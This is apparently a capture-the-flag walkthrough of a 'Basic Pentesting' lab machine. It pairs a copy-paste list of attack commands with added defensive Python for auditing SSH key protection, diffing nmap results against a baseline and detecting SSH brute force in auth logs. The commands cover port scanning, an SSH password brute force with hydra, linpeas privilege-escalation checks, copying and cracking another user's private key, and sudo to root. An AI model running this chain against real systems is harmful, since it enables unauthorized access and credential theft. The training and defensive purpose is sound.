Basic Pentesting

Command-Argument structure

Interacting with a Linux system is simple: everything you type is either a command or an argument.

  • cat hello.txt will print out the contents of the hello.txt file
  • ls -a /home/user shows all (including hidden) contents of the /home/user directory; -a is the argument that asks for hidden entries

Hacker Commands

The following list contains all the commands you will need to hack the computer. Feel free to copy and paste your way to victory!

#Conduct your initial Recon with nmap
nmap <IP Address>
nmap -sV <IP Address> -p<ports>
#Find hidden directories with gobuster
gobuster dir -u <IP Address> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
#Conduct additional reconnaissance on the Samba service
~/Desktop/Tools/Miscellaneous/enum4linux <IP Address>
#Bruteforce the SSH password (-l is the lowercase letter L)
hydra -l <username> -P /usr/share/wordlists/rockyou.txt <IP Address> ssh -V
#Login to the computer using ssh
ssh <username>@<IP Address>
#Find vectors to conduct privilege escalation
whoami
sudo -l
find / -perm /4000 2>/dev/null
scp /opt/PEAS/linPEAS/linpeas.sh <username>@<IP Address>:/tmp
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh > /tmp/vulnerabilities.txt
cat /home/<user>/.ssh/id_rsa
#Crack the passphrase of the SSH private key (ssh2john.py lives in /opt/john)
scp <username>@<IP Address>:/home/<user>/.ssh/id_rsa . && chmod 600 id_rsa
chmod +x /opt/john/ssh2john.py
/opt/john/ssh2john.py id_rsa > id_rsa.hash
john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
ssh -i id_rsa <user>@<IP Address>
#Get root access
cat passwords.bak
sudo -l
sudo su
cat /root/root.txt
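
The "crack the ssh" steps above only work because the copied id_rsa is protected by nothing more than its passphrase: an unencrypted key logs in immediately, a legacy PEM key uses a one-round MD5 key derivation that john chews through quickly, and only a bcrypt-protected openssh-key-v1 file makes the wordlist attack expensive. The following Python is an added example, not code from the write-up or from the room, showing how an administrator can audit private keys for that weakness by reading the key envelope: for the openssh-key-v1 format it parses the cipher name, KDF name and bcrypt round count from the header; for legacy PEM it reads the Proc-Type/DEK-Info headers. The three test vectors are constructed inside the block; the openssh-key-v1 ones are syntactically valid envelopes whose key material is dummy bytes, not usable keys. The helper and function names are this example's own.

```python
import base64
import struct
from typing import NamedTuple, Optional, Tuple

MAGIC = b"openssh-key-v1\x00"


class KeyInfo(NamedTuple):
    fmt: str                  # "openssh-key-v1" or "pem" (legacy)
    cipher: str               # "none" means the private section is stored in clear
    kdf: str                  # "bcrypt", "none", or the legacy EVP_BytesToKey
    kdf_rounds: Optional[int]
    encrypted: bool


def _read_string(buf: bytes, off: int) -> Tuple[bytes, int]:
    """Read one SSH wire 'string' (uint32 big-endian length + bytes)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def inspect_private_key(pem_text: str) -> KeyInfo:
    """Report how (and whether) a private key file is passphrase-protected."""
    lines = [l.strip() for l in pem_text.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(MAGIC):
            raise ValueError("not an openssh-key-v1 blob")
        off = len(MAGIC)
        cipher, off = _read_string(blob, off)
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        rounds = None
        if kdf == b"bcrypt":                      # kdfoptions = string salt, uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        return KeyInfo("openssh-key-v1", cipher.decode(), kdf.decode(), rounds, cipher != b"none")
    # Legacy PEM (BEGIN RSA PRIVATE KEY etc.): encryption is signalled by headers,
    # and the key is derived with a single MD5 round (EVP_BytesToKey).
    headers = dict(l.split(": ", 1) for l in lines[1:] if ": " in l)
    encrypted = headers.get("Proc-Type", "").endswith("ENCRYPTED")
    cipher = headers.get("DEK-Info", "none,").split(",")[0] if encrypted else "none"
    return KeyInfo("pem", cipher, "EVP_BytesToKey(MD5)" if encrypted else "none",
                   1 if encrypted else None, encrypted)


def classify(info: KeyInfo) -> str:
    """Triage verdict a defender can act on."""
    if not info.encrypted:
        return "UNPROTECTED: usable as-is by anyone who can read the file"
    if info.fmt == "pem":
        return "WEAK-KDF: legacy PEM encryption is cheap to brute-force offline"
    if info.kdf == "bcrypt" and (info.kdf_rounds or 0) < 16:
        return "LOW-ROUNDS: bcrypt rounds below the ssh-keygen default of 16"
    return "OK: passphrase-protected with bcrypt KDF"


# ---- constructed test vectors (dummy key material, NOT real keys) ----
def _string(b: bytes) -> bytes:
    return struct.pack(">I", len(b)) + b


def build_openssh_key_header(cipher: str, kdf: str, rounds: int = 16,
                             salt: bytes = b"\x00" * 16) -> str:
    """Constructed openssh-key-v1 envelope with placeholder public/private sections."""
    kdfopts = (_string(salt) + struct.pack(">I", rounds)) if kdf == "bcrypt" else b""
    blob = (MAGIC + _string(cipher.encode()) + _string(kdf.encode()) + _string(kdfopts)
            + struct.pack(">I", 1) + _string(b"dummy-public-key") + _string(b"dummy-private-section"))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


UNPROTECTED_KEY = build_openssh_key_header("none", "none")
PROTECTED_KEY = build_openssh_key_header("aes256-ctr", "bcrypt", rounds=16)
LEGACY_ENCRYPTED_KEY = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

ZHVtbXktZW5jcnlwdGVkLWtleS1ib2R5
-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for name, pem in [("unprotected", UNPROTECTED_KEY), ("protected", PROTECTED_KEY),
                      ("legacy", LEGACY_ENCRYPTED_KEY)]:
        info = inspect_private_key(pem)
        print(f"{name:<12} {info.fmt:<15} cipher={info.cipher:<12} kdf={info.kdf:<20} {classify(info)}")
```

Pointed at real files (for example every ~/.ssh/id_* on a host), the same function turns the page's "cat /home/<user>/.ssh/id_rsa" finding into a checklist item: keys that come back UNPROTECTED or WEAK-KDF should be regenerated with ssh-keygen so they get the openssh-key-v1 format with a bcrypt KDF and a passphrase that is not in a wordlist.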

Step 1 — Recon

When it comes to pentesting, you always start with gathering intelligence. In our case, we want to know what ways we can access the computer associated with the IP address we are given.

nmap <IP Address>
nmap -sV <IP Address> -p<ports>
[Screenshots: nmap scan; nmap version scan]
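
The same scan output is what a defender reads when validating a host's attack surface: every open port that the system's documented role does not account for is a finding before anyone touches it. The Python below is an added example, not code from the write-up, that parses nmap's greppable output (the real -oG option) and diffs the open ports against an exposure baseline. The scan text and the baseline are constructed for the example; the host, ports and version strings are invented, not the room's actual results.

```python
import re
from typing import Dict, List, NamedTuple, Set

# Constructed sample of nmap "greppable" output (-oG). Host, ports and version
# strings are invented for this example; they are not the write-up's scan results.
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated as: nmap -sV -oG scan.gnmap 10.10.10.5
Host: 10.10.10.5 ()\tStatus: Up
Host: 10.10.10.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.x (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.x/, 139/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X/, 445/open/tcp//netbios-ssn//Samba smbd 4.x/, 3306/filtered/tcp//mysql///\tIgnored State: closed (995)
# Nmap done at Wed Jan 10 12:00:00 2024 -- 1 IP address (1 host up) scanned
"""

# One -oG port entry: port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")


class OpenPort(NamedTuple):
    host: str
    port: int
    proto: str
    service: str
    version: str


def parse_gnmap(text: str) -> List[OpenPort]:
    """Return every port nmap reported as open, in file order."""
    found: List[OpenPort] = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # the Ports: field runs up to the next tab-separated field
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for port, state, proto, _owner, service, _rpc, version in PORT_RE.findall(ports_field):
            if state == "open":
                found.append(OpenPort(host, int(port), proto, service, version.strip()))
    return found


# Exposure baseline: which ports each host is *supposed* to serve. Constructed
# for the example; in practice it comes from the system's documented role.
EXPECTED_PORTS: Dict[str, Set[int]] = {"10.10.10.5": {80}}


def unexpected_exposure(ports: List[OpenPort], expected: Dict[str, Set[int]]) -> List[OpenPort]:
    """Open ports the baseline does not account for (e.g. SMB on a web host)."""
    return [p for p in ports if p.port not in expected.get(p.host, set())]


if __name__ == "__main__":
    for p in unexpected_exposure(parse_gnmap(SAMPLE_GNMAP), EXPECTED_PORTS):
        print(f"{p.host}:{p.port}/{p.proto} {p.service:<12} {p.version}  <- not in baseline")
```

Run against a real scan.gnmap, the three flagged lines (22, 139, 445 on a host that is only meant to serve HTTP) are exactly the services the rest of this walkthrough goes after, which is why periodic self-scans diffed against a baseline catch this class of exposure early.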

Step 2 — Attacking HTTP

From our scan, we can see there are a couple of ports open. Everybody should know port 80, the port used to serve a website. That means we can browse the website with Firefox or Chrome.

[Screenshot: results of the website]
gobuster dir -u <IP Address> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[Screenshot: using gobuster]
  • A hint about SMB (another service), perhaps
  • Weak passwords in /etc/shadow (a Linux file that contains password hashes) → password cracking?

Step 3 — Attacking SMB

Since the hints mentioned SMB, let’s take a look at that. If you refer to the nmap scan we did earlier, ports 139 and 445 happen to be SMB servers.

~/Desktop/Tools/Miscellaneous/enum4linux <IP Address>
[Screenshot: some super interesting results from enum4linux]
hydra -l <username> -P /usr/share/wordlists/rockyou.txt <IP Address> ssh -V
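
The hydra command here (and in the command list above) is loud from the server's point of view: every guess is one "Failed password" line in the SSH daemon's auth log, and a hit is followed by "Accepted password" from the same address. The Python below is an added example, not from the write-up, of the detection logic a defender runs over those lines: it parses sshd messages, counts failed password attempts per source address inside a sliding window, raises an alert once a threshold is crossed, and marks the alert when the same address later logs in successfully (the case that needs an incident response, not just a block). The log excerpt is constructed, with invented hosts, users and addresses; the function and threshold names are this example's own.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, List, NamedTuple, Tuple

# Constructed auth.log excerpt (OpenSSH sshd messages). Hostnames, users and
# addresses are invented for this example.
SAMPLE_AUTH_LOG = """\
Jan 10 12:00:01 target sshd[1201]: Failed password for invalid user admin from 10.10.14.3 port 51322 ssh2
Jan 10 12:00:02 target sshd[1203]: Failed password for alice from 10.10.14.3 port 51324 ssh2
Jan 10 12:00:03 target sshd[1205]: Failed password for alice from 10.10.14.3 port 51326 ssh2
Jan 10 12:00:04 target sshd[1207]: Failed password for alice from 10.10.14.3 port 51328 ssh2
Jan 10 12:00:05 target sshd[1209]: Failed password for alice from 10.10.14.3 port 51330 ssh2
Jan 10 12:00:06 target sshd[1211]: Failed password for alice from 10.10.14.3 port 51332 ssh2
Jan 10 12:00:08 target sshd[1213]: Accepted password for alice from 10.10.14.3 port 51334 ssh2
Jan 10 12:03:00 target sshd[1300]: Failed password for root from 192.0.2.7 port 40000 ssh2
Jan 10 12:05:03 target sshd[1302]: Accepted publickey for deploy from 192.0.2.9 port 40010 ssh2: RSA SHA256:AAAA
Jan 10 12:06:00 target CRON[1400]: pam_unix(cron:session): session opened for user root by (uid=0)
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


class Event(NamedTuple):
    ts: datetime
    result: str   # "Failed" or "Accepted"
    method: str   # "password" or "publickey"
    user: str
    ip: str


def parse_auth_log(text: str) -> List[Event]:
    """Keep only sshd authentication results; other daemons' lines are ignored."""
    events: List[Event] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            # syslog stamps carry no year; strptime defaults it to 1900, which is
            # fine for computing differences within one log file
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
            events.append(Event(ts, m["result"], m["method"], m["user"], m["ip"]))
    return events


class Alert(NamedTuple):
    ip: str
    failures: int            # failures inside the triggering window
    users: Tuple[str, ...]   # accounts tried during that window
    span_seconds: float
    success_after: bool      # the same IP authenticated after the burst


def detect_bruteforce(events: List[Event], threshold: int = 5, window: int = 60) -> List[Alert]:
    """Flag source IPs with >= threshold failed password attempts within `window`
    seconds; mark the alert if the same IP later authenticates successfully."""
    recent: Dict[str, Deque[Tuple[datetime, str]]] = defaultdict(deque)
    alerts: Dict[str, Alert] = {}
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.result == "Failed" and ev.method == "password":
            q = recent[ev.ip]
            q.append((ev.ts, ev.user))
            while (ev.ts - q[0][0]).total_seconds() > window:   # slide the window
                q.popleft()
            if len(q) >= threshold:
                prev = alerts.get(ev.ip)
                alerts[ev.ip] = Alert(ev.ip, len(q), tuple(sorted({u for _, u in q})),
                                      (ev.ts - q[0][0]).total_seconds(),
                                      prev.success_after if prev else False)
        elif ev.result == "Accepted" and ev.ip in alerts:
            alerts[ev.ip] = alerts[ev.ip]._replace(success_after=True)
    return list(alerts.values())


if __name__ == "__main__":
    for a in detect_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG)):
        tag = "COMPROMISED?" if a.success_after else "blocked/ongoing"
        print(f"{a.ip}: {a.failures} failures in {a.span_seconds:.0f}s against {a.users} -> {tag}")
```

The single alert this produces is the whole of Step 3 seen from the other side; the usual mitigations are to rate-limit or ban the address after a handful of failures, to disable password authentication for SSH in favour of keys, and to treat a success that follows a burst as a compromised account rather than a noisy one.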

Resources

dirbuster checklist

West Point CyberTech

Cadet run, Cyber education, Remote Interviews, Unofficial (Does not represent the views of USMA)